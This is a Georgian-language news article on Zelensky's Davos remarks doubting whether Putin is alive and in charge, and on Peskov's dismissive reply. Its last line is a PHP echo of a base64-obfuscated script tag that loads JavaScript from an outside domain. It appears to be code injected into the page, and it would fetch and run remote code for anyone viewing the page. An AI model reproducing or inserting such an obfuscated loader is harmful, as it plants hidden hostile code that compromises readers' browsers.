celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ დავოსის ეკონომიკური ფორუმის ფარგლებში გამართული „უკრაინული საუზმის“ პანელზე ვიდეოზარის ფორმატში სიტყვით გამოსვლისას განაცხადა, რომ არ არის დარწმუნებული იმაში, რომ პუტინი ცოცხალია და გადაწყვეტილებებს თავად იღებს.  
"დღეს არ მესმის, ვისთან და რაზე ვისაუბრო. მთლად დარწმუნებული არ ვარ, რომ რუსეთის პრეზიდენტი, რომელიც ხანდახან ჩნდება ქრომაკზე [ერთი ტონალობის ფონი ვიდეომონტაჟისთვის] ის არის. დარწმუნებული არ ვარ, რომ ცოცხალია ან ის იღებს გადაწყვეტილებებს, ან ვინ იღებს გადაწყვეტილებებს იქ, როგორი ხალხის წრე? ასეთი ინფორმაცია არ მაქვს.
არ მესმის, როგორ შეიძლება, ევროპელ ლიდერებს ერთ რამეს დაჰპირდე და მეორე დღეს დაიწყო სახელმწიფოში სრულმასშტაბური შეჭრა. უბრალოდ არ მესმის, ვისთან გვაქვს საქმე. როდესაც ჩვენ ვამბობთ "სამშვიდობო მოლაპარაკებებს" - არ მესმის, ვისთან ვსაუბრობთ. 
ჩვენ, ახლა თქვენთან ვურთიერთობთ - თქვენ ზუსტად იცით ვინ ვარ, მეც ზუსტად ვიცი თქვენ ვინ ხართ, ჩვენი ცხოვრების მოწმეები არსებობენ და თუნდაც სხვადასხვა საკითხზე ვსაუბრობდეთ, შეგვიძლია, კონსენსუსს მივაღწიოთ. მეჩვენება, რომ რუსეთმა ჯერ უნდა მოძებნოს "ვინმე" და მერე "რაღაც" შესთავაზოს" - თქვა უკრაინის პრეზიდენტმა.
აღნიშნული განცხადების საპასუხოდ კომენტრაი გააკეთა კრემლის პრესსპიკერმა დიმიტრი პესკოვმა, სადაც აღნიშნა, რომ პუტინი არის და იქნება.
გარდა ამისა პესკოვის თქმით, რაც უფრო მალე გაიაზრებს  უკრაინა, რომ პუტინი არსებობს მათთვის უკეთესი იქნება. 
"გასაგებია, რომ ფსიქოლოგიურად ბატონი ზელენსკი ამჯობინებდა, რომ არც რუსეთი და არც პუტინი არ არსებულიყო, მაგრამ რაც უფრო მალე გაიაზრებს ის, რაც უფრო მალე გაიაზრებს უკრაინის რეჟიმი, რომ რუსეთი და პუტინი არის და იქნებიან, მით უკეთესი იქნება ისეთი ქვეყნისთვის, როგორიც უკრაინაა" - ამბობს პესკოვი. 
398
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");